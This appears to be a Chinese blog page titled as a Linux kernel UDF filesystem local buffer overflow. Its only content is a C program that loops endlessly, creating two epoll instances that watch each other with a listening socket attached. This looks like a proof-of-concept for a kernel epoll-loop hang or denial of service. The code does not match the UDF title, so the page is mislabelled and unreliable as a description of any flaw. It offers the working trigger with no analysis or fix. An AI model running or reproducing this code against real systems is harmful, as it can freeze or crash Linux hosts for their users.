linux文件系统漏洞,Linux Kernel UDF文件系统本地缓冲区溢出漏洞

#include <netinet/in.h>

#include <sys/epoll.h>

#include <errno.h>

int

main ()

{

struct sockaddr_in addr;

struct epoll_event event;

int epfd1, epfd2, sock;

int rc;

int i = 0;

while (1)

{

printf("ITERATION %d\n", ++i);

epfd1 = epoll_create(1);

printf("epoll_create() -> %d(%d)\n", epfd1, errno);

epfd2 = epoll_create(1);

printf("epoll_create() -> %d(%d)\n", epfd2, errno);

sock = socket(PF_INET, SOCK_STREAM, 0);

printf("socket() -> %d(%d)\n", sock, errno);

addr.sin_family = AF_INET;

addr.sin_port = 0;

addr.sin_addr.s_addr = 0;

rc = bind(sock, (struct sockaddr*)&addr, sizeof(addr));

printf("bind() -> %d(%d)\n", rc, errno);

rc = listen(sock, 1);

printf("listen() -> %d(%d)\n", rc, errno);

event.data.fd = sock;

event.events = 0;

rc = epoll_ctl(epfd1, EPOLL_CTL_ADD, sock, &event);

printf("epoll_ctl() -> %d(%d)\n", rc, errno);

event.data.fd = epfd2;

event.events = EPOLLIN;

rc = epoll_ctl(epfd1, EPOLL_CTL_ADD, epfd2, &event);

printf("epoll_ctl() -> %d(%d)\n", rc, errno);

event.data.fd = epfd1;

event.events = EPOLLIN;

rc = epoll_ctl(epfd2, EPOLL_CTL_ADD, epfd1, &event);

printf("epoll_ctl() -> %d(%d)\n", rc, errno);

rc = close(epfd1);

printf("close(epfd1) -> %d(%d)\n", rc, errno);

rc = close(epfd2);

printf("close(epfd2) -> %d(%d)\n", rc, errno);

rc = close(sock);

printf("close(sock) -> %d(%d)\n", rc, errno);

sleep(1);

printf("\n\n");

}

return 0;

}

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值